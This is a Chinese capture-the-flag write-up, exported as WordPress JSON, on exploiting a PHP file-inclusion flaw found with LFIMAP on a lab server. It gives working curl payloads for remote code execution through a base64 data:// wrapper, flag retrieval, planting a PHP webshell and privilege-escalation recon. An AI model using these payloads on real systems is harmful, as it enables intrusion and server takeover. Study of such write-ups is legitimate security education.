{"id":39,"date":"2025-12-16T15:02:11","date_gmt":"2025-12-16T07:02:11","guid":{"rendered":"https:\/\/blog.marsrains.top\/?p=39"},"modified":"2026-04-03T14:56:42","modified_gmt":"2026-04-03T06:56:42","slug":"%e5%88%a9%e7%94%a8lfimap%e6%89%ab%e6%8f%8f%e7%9a%84%e6%bc%8f%e6%b4%9e%e5%b9%b6%e8%8e%b7%e5%8f%96flag","status":"publish","type":"post","link":"https:\/\/myblog.marsrains.top\/?p=39","title":{"rendered":"\u5229\u7528LFIMAP\u626b\u63cf\u7684\u6f0f\u6d1e\u5e76\u83b7\u53d6flag"},"content":{"rendered":"\n

\u4e00\u3001\u6982\u51b5<\/h2>\n\n\n\n

\u76ee\u6807\u7f51\u5740\uff1ahttp:\/\/211.103.180.146<\/p>\n\n\n\n

\u6d4b\u8bd5\u76ee\u6807\uff1a\u7528LFIMAP\u626b\u63cf\u6f0f\u6d1e\uff0c\u5229\u7528\u8fd4\u56de\u7684\u6f0f\u6d1e\u7ed3\u679c\u67e5\u627eflag<\/p>\n\n\n\n

\u6d4b\u8bd5\u65f6\u95f4\uff1a2025.12.15<\/p>\n\n\n\n

\u6d4b\u8bd5\u4eba\u5458\uff1aMarsRain<\/p>\n\n\n\n

\u4e8c\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n

\u5148\u767b\u5f55\u7f51\u7ad9\uff0c\u80fd\u76f4\u63a5\u770b\u5230\u9875\u9762\u62ac\u5934\u660e\u786e\u5c55\u793a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5e76\u4e14\u7ed9\u51fa\u8be6\u7ec6\u53c2\u6570\uff1afile<\/mark>\u3002\u4e3a\u4e86\u9a8c\u8bc1\uff0c\u5148\u7528LFIMAP\u626b\u63cf\u4e00\u4e0b\u5177\u4f53\u6709\u54ea\u4e9b\u6f0f\u6d1e\u7136\u540e\u63d0\u53d6\u91cc\u9762\u7684\u91cd\u8981\u4fe1\u606f<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
python lfimap.py -U \"http:\/\/211.103.180.146:11097\/index.php?file=\" -a\ncrul -I \"http:\/\/211.103.180.146:11097\/\"<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4ece\u8fd9\u6b21\u7528file\u53c2\u6570<\/mark>\u53ef\u4ee5\u63d0\u53d6\u51fa\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n\n\n\n
    \n
  • Debian\u73af\u5883\u4e0b\u7684Apache\/2.4.25<\/li>\n\n\n\n
  • PHP \u7248\u672c\u4e3a 7.2.14<\/li>\n\n\n\n
  • UTF-8\u7f16\u7801<\/li>\n\n\n\n
  • \u4e94\u4e2a\u6f0f\u6d1e\uff0c\u5206\u522b\u4e3a\uff1a\n
      \n
    • Info disclosure<\/mark>\uff08\u4fe1\u606f\u6cc4\u9732\uff09\u2014\u2014\u53ef\u4ee5\u901a\u8fc7\u53d1\u9001\u5e26\u6709\u7279\u6b8a\u5b57\u7b26\u7684\u8bf7\u6c42\uff0c\u89e6\u53d1\u4e86 include(<\/code> <\/mark>\u76f8\u5173\u7684\u9519\u8bef\u4fe1\u606f\uff0c\u8868\u660e\u53c2\u6570\u672a\u88ab\u4fdd\u62a4\u5bfc\u81f4\u6587\u4ef6\u6cc4\u9732<\/li>\n\n\n\n
    • RCE<\/mark>\uff08\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff09 \u2014\u2014\u53ef\u4ee5\u901a\u8fc7 data:\/\/<\/code> <\/mark>\u4f2a\u534f\u8bae\uff0c\u4e0a\u4f20\u7ecf\u8fc7Base64\u7f16\u7801\u7684PHP\u4ee3\u7801\uff0c\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4<\/li>\n\n\n\n
    • LFI<\/mark> \uff08\u672c\u5730\u6587\u4ef6\u5305\u542b\uff09\u2014\u2014\u53ef\u4ee5\u901a\u8fc7 file:\/\/\/etc\/passwd<\/mark><\/code> \u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u7684 \/etc\/passwd<\/code> <\/mark>\u6587\u4ef6<\/li>\n\n\n\n
    • RFI<\/mark> \uff08\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff09\u2014\u2014\u53ef\u4ee5\u901a\u8fc7\u4f20\u5165\u8fdc\u7a0b URL \u6765\u5305\u542b\u5916\u90e8\u6587\u4ef6\uff0c\u4ece\u800c\u6267\u884c\u8fdc\u7a0b\u4ee3\u7801<\/li>\n\n\n\n
    • \u53e6\u4e00\u4e2aLFI<\/mark>\u2014\u2014\u76f4\u63a5\u901a\u8fc7\u4f20\u53c2\u8fd4\u56de\/etc\/passwd<\/mark>\u7ed3\u679c<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
      \u4e09\u3001\u6f0f\u6d1e\u5229\u7528\u548c\u5206\u6790<\/h2>\n\n\n\n
      1\u3001\u9a8c\u8bc1<\/h3>\n\n\n\n
      \u4ece\u8fd4\u56de\u7684\u7ed3\u679c\u4e2d\u68c0\u67e5\uff0c\u5148\u7528RCE\u5c1d\u8bd5\u3002\u590d\u5236\u5176\u4e2d\u8fd4\u56de\u7684Base64\u7f16\u7801\u540e\u7684PHP\u4ee3\u7801\uff0c\u4fee\u6539\u540e\u9762\u7684cat\u547d\u4ee4\u4e3a\u5176\u4ed6\u547d\u4ee4\uff0c\u5982whoami\u3001ls<\/mark>\u5e76\u89c2\u5bdf\u8fd4\u56de\u7ed3\u679c<\/p>\n\n\n\n
      - curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=ls\"\n- curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdK\nTsgPz4K&c=whoami\"<\/code><\/pre>\n\n\n\n
      \"\"<\/div>
      whoami\u8fd4\u56de\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
      \"\"<\/div>
      ls\u8fd4\u56de\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
      2\u3001\u76f4\u63a5\u4fee\u6539\u7cfb\u7edf\u547d\u4ee4<\/h3>\n\n\n\n
      \u901a\u8fc7\u4fee\u6539\u7cfb\u7edf\u547d\u4ee4ls -F \/<\/mark>\uff0cURL\u7f16\u7801\u540e\u4e0a\u4f20\u76f4\u63a5\u56de\u663e\u6839\u76ee\u5f55\u4e0b\u6240\u6709\u6587\u4ef6\u5939<\/p>\n\n\n\n
      curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=ls+-F+%2f\"<\/code><\/pre>\n\n\n\n
      \"\"<\/div>
      ls -F \/\u8fd4\u56de\u7684\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
      \u53d1\u73b0flag.wasj\uff0c\u76f4\u63a5cat\u6293\u53d6\u83b7\u5f97\u6700\u7ec8flag\uff1aflag_nisp_cbf37d<\/mark><\/p>\n\n\n\n
      curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=cat+%2fflag.wasj\"<\/code><\/pre>\n\n\n\n
      \"\"<\/div>
      cat \/flag.wasj\u8fd4\u56de\u7684\u6700\u7ec8\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
      \u56db\u3001\u9644\u52a0\uff1a\u5c1d\u8bd5\u63d0\u6743<\/h2>\n\n\n\n
      1\u3001\u83b7\u53d6\u5173\u952e\u4fe1\u606f<\/h3>\n\n\n\n
      \u63d0\u6743\u7684\u5173\u952e\u662f\u53d1\u73b0\u7cfb\u7edf\u4e2d\u5b58\u5728\u7684\u6743\u9650\u6f0f\u6d1e\u3001\u914d\u7f6e\u9519\u8bef\u3001\u6216\u8005\u5df2\u77e5\u6f0f\u6d1e<\/strong>\u3002\u4e3b\u8981\u5305\u62ec\uff1a<\/p>\n\n\n\n
        \n
      • Sudo\u6743\u9650\u68c0\u67e5<\/strong><\/li>\n\n\n\n
      • \u8ba1\u5212\u4efb\u52a1\uff08cron\uff09<\/strong><\/li>\n\n\n\n
      • \u53ef\u5199\u7684\u654f\u611f\u6587\u4ef6\u6216\u76ee\u5f55<\/strong><\/li>\n\n\n\n
      • \u7cfb\u7edf\u670d\u52a1\u6f0f\u6d1e<\/strong><\/li>\n\n\n\n
      • \u5185\u6838\u6f0f\u6d1e<\/strong><\/li>\n\n\n\n
      • \u73af\u5883\u53d8\u91cf\u548c\u914d\u7f6e\u6587\u4ef6\u6cc4\u6f0f<\/strong><\/li>\n<\/ul>\n\n\n\n
        2\u3001\u6784\u9020\u4e0a\u4f20webshell<\/h3>\n\n\n\n
        \u6784\u9020webshell\u4e0a\u4f20\u540e\u4e3b\u8981\u4f5c\u7528\u662f\u8ba9\u547d\u4ee4\u7b80\u6d01\u4e00\u70b9\uff0c\u65b9\u4fbf\u540e\u7eed\u64cd\u4f5c<\/mark><\/p>\n\n\n\n
        \u6784\u9020\u4e00\u6bb5PHP\u4ee3\u7801\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff1a<\/p>\n\n\n\n
        '<?php system($_GET[cmd]); ?>'<\/code><\/pre>\n\n\n\n
        \u7136\u540e\u5c06\u5176\u8fdb\u884cURL\u7f16\u7801\u52a0\u5165\u5230Base64\u7f16\u7801\u540e<\/p>\n\n\n\n
        echo '<?php system($_GET[cmd]); ?>' > shell.php<\/code><\/pre>\n\n\n\n
        \u6700\u540e\u7ec4\u6210\u547d\u4ee4\uff1a<\/p>\n\n\n\n
        curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdK\nTsgPz4K&c=echo%20'%3C%3Fphp%20system($_GET%5Bcmd%5D);%20%3F%3E'%20%3E%20shell.php\"<\/code><\/pre>\n\n\n\n
        \u9a8c\u8bc1\u662f\u5426\u4e0a\u4f20\u6210\u529f\uff1a<\/p>\n\n\n\n
        curl \"http:\/\/211.103.180.146:11097\/index.php?file=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=ls\"<\/code><\/pre>\n\n\n\n
        \"\"<\/div>
        ls\u8fd4\u56de\u7684\u65b0\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
        \u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u65b0\u6587\u4ef6\uff1ashell.php \u8bc1\u660e\u4e0a\u4f20\u6210\u529f \u4e4b\u540e\u9a8c\u8bc1\u662f\u5426\u53ef\u7528<\/p>\n\n\n\n
        curl \"http:\/\/211.103.180.146:11097\/shell.php?cmd=whoami<\/code><\/pre>\n\n\n\n
        \"\"<\/div>
        shell.php\u4e0bwhoami\u8fd4\u56de\u7684\u65b0\u7ed3\u679c<\/em><\/figcaption><\/figure>\n\n\n\n
        3\u3001\u67e5\u770b\u7cfb\u7edf\u7248\u672c\u53ca\u7528\u6237\u7ec4\u4fe1\u606f<\/h3>\n\n\n\n
        \u6784\u9020payload\u67e5\u770b\u7cfb\u7edf\u7248\u672c\uff1a<\/p>\n\n\n\n
        uname -a\uff1a\n- curl \"http:\/\/211.103.180.146:11097\/shell.php?cmd=uname+-a\ncat \/etc\/os-release:\n- curl \"http:\/\/211.103.180.146:11097\/shell.php?cmd=cat+%2fetc%2fos-release\"\nid\uff1a\n- curl \"http:\/\/211.103.180.146:11097\/shell.php?cmd=id\"<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5185\u6838\u7248\u672c<\/td>6.8.0-85-generic<\/td><\/tr>
        \u64cd\u4f5c\u7cfb\u7edf<\/td>Ubuntu 22.04.1 LTS<\/td><\/tr>
        \u67b6\u6784<\/td>x86_64<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
        \u4ece\u63d0\u53d6\u7684\u4fe1\u606f\u53ef\u4ee5\u5f97\u51fa\uff1a<\/p>\n\n\n\n
          \n
        • \u8be5\u5185\u6838\u7248\u672c\u8f83\u65b0\uff0c\u516c\u5f00\u5df2\u77e5\u7684\u9ad8\u5371\u5185\u6838\u63d0\u6743\u6f0f\u6d1e\u76f8\u5bf9\u8f83\u5c11<\/li>\n\n\n\n
        • \u5e38\u89c1\u6f0f\u6d1e\u5982Dirty COW<\/mark>\u3001Ptrace\u6f0f\u6d1e<\/mark>\u3001OverlayFS\u672c\u5730\u63d0\u6743<\/mark>\u5747\u5df2\u88ab\u4fee\u590d<\/li>\n<\/ul>\n\n\n\n
          \u8d34\u4e00\u4e2a\u7b80\u5355\u7684LFImap\u7684\u57fa\u7840\u547d\u4ee4<\/p>\n\n\n\n
          \"\"<\/div><\/figure>\n\n\n\n
          \u7531\u4e8e\u539f\u9776\u573a\u6587\u4ef6\u4e22\u5931\uff0c\u53ea\u80fd\u5230\u6b64\u4e3a\u6b62Orz<\/h2>\n\n\n\n
          \u6b22\u8fce\u67e5\u770b\u5176\u5b83\u535a\u5ba2\uff0c\u518d\u6b21\u58f0\u660e\uff1a\u672c\u6587\u4ec5\u4f9b\u4e2a\u4eba\u6280\u672f\u5b66\u4e60\u4ea4\u6d41\uff0c\u4e0d\u4f5c\u4e3a\u4efb\u4f55\u7684\u5efa\u8bae\u548c\u6307\u5bfc\u6765\u8fdb\u884c\u76f8\u5173\u7684\u653b\u51fb\u751a\u81f3\u662f\u8fdd\u6cd5\u64cd\u4f5c\u3002\u5982\u679c\u6709\u76f8\u5173\u8fdd\u6cd5\u884c\u4e3a\uff0c\u6982\u4e0d\u8d1f\u8d23\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
          \u4e00\u3001\u6982\u51b5 \u76ee\u6807\u7f51\u5740\uff1ahttp:\/\/211.103.180.146 \u6d4b\u8bd5\u76ee\u6807\uff1a\u7528LFIMAP\u626b\u63cf\u6f0f\u6d1e\uff0c\u5229\u7528\u8fd4\u56de\u7684 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"[]"},"categories":[6,15],"tags":[18],"class_list":["post-39","post","type-post","status-publish","format-standard","hentry","category-capture-the-flag","category-15","tag-18"],"_links":{"self":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39"}],"version-history":[{"count":24,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/39\/revisions"}],"predecessor-version":[{"id":727,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/39\/revisions\/727"}],"wp:attachment":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}